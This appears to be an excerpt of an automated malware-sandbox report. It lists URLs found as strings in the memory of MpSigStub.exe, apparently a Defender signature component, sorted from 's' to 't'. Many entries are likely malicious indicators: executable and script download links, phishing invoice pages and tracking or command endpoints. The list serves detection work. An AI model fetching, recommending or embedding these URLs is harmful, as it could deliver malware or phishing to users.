Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://solk.seamscreative.info:8080/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://sondervisual.com.ar/cnt.php?id=7314582
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://sprout17.blond.av4610.net/set_inf.php?id=movie_ef.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://squash13.navy.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://srlvonf.info/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://starcorpinc.com?
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://start.abauit.com/logo.png?v7err
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn
Source: MpSigStub.exe, 00000023.00000003.6273836006.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cnxv
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://strategosvideo4.com/1547.avi.exe
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://studiojagoda.pl/invoice-receipt/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://stumptowncreative.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://suckjerkcock.date
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://sundsvallsrk.nu/tmp/lns.txt
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://sunrypero.cf/document5.doc
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp	String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://sys-doctor.com
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://systemfile.online
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://t%69%61%6ejinc%6e.cn
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://t.amy
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://tak-tik.site/crun20.gif
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://talk-of-the-tyne.co.uk/download
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://tbapi.search.ask.comxb
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://tccinfaes.com
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://test.ru/botadmin/index.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://thespecsupportservice.com/uno.dat
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://thevgjhknjkstore.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://thorsolberg.com?
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://tibiahack.czweb.org/adduser.php?num=
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/glpdpd4
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/oc725yj
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://tirb.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://tixwagoq.cn/in.cgi?14
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://toetallynailed.com?
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://traff.step57.info/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://try-anything-else.com/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/
